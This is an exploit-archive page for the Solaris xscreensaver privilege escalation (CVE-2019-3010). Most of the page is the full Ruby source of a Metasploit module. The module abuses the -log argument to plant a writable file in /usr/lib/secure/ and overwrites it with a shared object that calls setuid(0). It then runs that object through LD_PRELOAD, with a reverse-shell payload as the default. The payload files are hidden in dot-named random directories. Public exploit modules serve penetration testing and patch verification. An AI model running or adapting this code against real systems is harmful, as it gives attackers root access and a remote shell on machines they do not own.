exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Solaris xscreensaver Privilege Escalation

Solaris xscreensaver Privilege Escalation
Posted Oct 23, 2019
Authored by Marco Ivaldi, Brendan Coles | Site metasploit.com

This Metasploit module exploits a vulnerability in xscreensaver versions since 5.06 on unpatched Solaris 11 systems which allows users to gain root privileges. xscreensaver allows users to create a user-owned file at any location on the filesystem using the -log command line argument introduced in version 5.06. This module uses xscreensaver to create a log file in /usr/lib/secure/, overwrites the log file with a shared object, and executes the shared object using the LD_PRELOAD environment variable. This module has been tested successfully on xscreensaver version 5.15 on Solaris 11.1 (x86) and xscreensaver version 5.15 on Solaris 11.3 (x86).

tags | exploit, x86, root
systems | solaris
advisories | CVE-2019-3010
SHA-256 | 61fc2ea992be47242e9913209ccde2e47b80ce69f13985b6c1cff3d42dbfc4cf

Solaris xscreensaver Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Solaris::Priv
include Msf::Post::Solaris::System
include Msf::Post::Solaris::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris xscreensaver log Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in `xscreensaver` versions
since 5.06 on unpatched Solaris 11 systems which allows users
to gain root privileges.

`xscreensaver` allows users to create a user-owned file at any
location on the filesystem using the `-log` command line argument
introduced in version 5.06.

This module uses `xscreensaver` to create a log file in `/usr/lib/secure/`,
overwrites the log file with a shared object, and executes the shared
object using the `LD_PRELOAD` environment variable.

This module has been tested successfully on:

xscreensaver version 5.15 on Solaris 11.1 (x86); and
xscreensaver version 5.15 on Solaris 11.3 (x86).
},
'References' =>
[
['CVE', '2019-3010'],
['EDB', '47509'],
['URL', 'https://seclists.org/fulldisclosure/2019/Oct/39'],
['URL', 'https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver'],
['URL', 'https://techblog.mediaservice.net/2019/10/local-privilege-escalation-on-solaris-11-x-via-xscreensaver/'],
['URL', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html']
],
'Notes' => { 'AKA' => ['raptor_xscreensaver'] },
'License' => MSF_LICENSE,
'Author' =>
[
'Marco Ivaldi', # Discovery and exploit
'bcoles' # Metasploit
],
'DisclosureDate' => '2019-10-16',
'Privileged' => true,
'Platform' => ['solaris', 'unix'],
'Arch' => [ARCH_CMD],
'Targets' => [['Auto', {}]],
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_ksh',
'WfsDelay' => 10,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
OptString.new('XSCREENSAVER_PATH', [true, 'Path to xscreensaver executable', '/usr/bin/xscreensaver']),
OptString.new('XORG_PATH', [true, 'Path to Xorg executable', '/usr/bin/Xorg'])
]
register_advanced_options [
OptString.new('Xdisplay', [true, 'Display to use if starting a new Xorg session', ':1']),
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end

def xscreensaver_path
datastore['XSCREENSAVER_PATH']
end

def xorg_path
datastore['XORG_PATH']
end

def mkdir(path)
vprint_status "Creating directory '#{path}'"
cmd_exec "mkdir -p '#{path}'"
register_dir_for_cleanup path
end

def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end

def upload_and_compile(path, data)
upload "#{path}.c", data

output = cmd_exec "PATH=\"$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin\" gcc -fPIC -shared -s -g -O2 -lc -o #{path} #{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end

register_file_for_cleanup path
end

def check
unless setuid? xscreensaver_path
vprint_error "#{xscreensaver_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{xscreensaver_path} is setuid"

unless has_gcc?
vprint_error 'gcc is not installed'
return CheckCode::Safe
end
vprint_good 'gcc is installed'

xscreensaver_version = cmd_exec("#{xscreensaver_path} --help").to_s.scan(/^xscreensaver ([\d\.]+)/).flatten.first
if xscreensaver_version.to_s.eql? ''
vprint_error 'Could not determine xscreensaver version'
return CheckCode::Detected
end

# Bug introduced in version 5.06. Patched in version <~ 5.42.
unless Gem::Version.new(xscreensaver_version).between?(Gem::Version.new('5.06'), Gem::Version.new('5.41'))
vprint_error "xscreensaver version #{xscreensaver_version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "xscreensaver version #{xscreensaver_version} appears to be vulnerable"

CheckCode::Appears
end

def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end

unless [CheckCode::Detected, CheckCode::Appears].include? check
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end

unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end

# Set display
display = cmd_exec 'echo $DISPLAY'
kill_xorg = false

if display.to_s.blank?
display = datastore['Xdisplay']
print_status "Starting Xorg on display #{display} ..."
cmd_exec "#{xorg_path} #{display} & echo "
kill_xorg = true
else
print_status "Using Xorg display #{display} ..."
end

# Create writable log file in /usr/lib/secure/
lib_name = rand_text_alphanumeric 5..10
if cmd_exec("/usr/bin/file #{xscreensaver_path}").to_s.include? 'ELF 64-bit'
secure_path = "/usr/lib/secure/64/"
else
secure_path = "/usr/lib/secure/"
end
lib_path = "#{secure_path}#{lib_name}.so"

print_status "Creating log file #{lib_path} ..."
cmd_exec "umask 0; DISPLAY=#{display} #{xscreensaver_path} -display #{display} -log #{lib_path} & echo "

Rex.sleep(5)

cmd_exec 'pkill -U `whoami` -n xscreensaver'
if kill_xorg
cmd_exec 'pkill -U `whoami` -n Xorg'
end

unless writable? lib_path
fail_with Failure::NotVulnerable, "Could not create writable log file #{lib_path}"
end

register_file_for_cleanup lib_path

# Upload and compile shared object
base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
mkdir base_path

payload_name = ".#{rand_text_alphanumeric 5..10}"
payload_path = "#{base_path}/#{payload_name}"

so = <<-EOF
#include <unistd.h>
void __attribute__((constructor)) cons() {
setuid(0);
setgid(0);
unlink("#{lib_path}");
execle("#{payload_path}", "", NULL, NULL);
_exit(0);
}
EOF

so_name = ".#{rand_text_alphanumeric 5..10}"
so_path = "#{base_path}/#{so_name}"
upload_and_compile so_path, so

# Overwrite newly created log file with compiled shared object
vprint_status "Writing shared object to #{lib_path}"
cmd_exec "cp '#{so_path}' '#{lib_path}'"

# Upload and execute payload
if payload.arch.first.to_s == 'cmd'
upload payload_path, "#!/bin/sh\n#{payload.encoded}"
else
upload payload_path, generate_payload_exe
end
chmod payload_path

print_status 'Executing payload...'
cmd_exec "LD_PRELOAD=#{lib_path} #{xscreensaver_path} --help & echo "
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close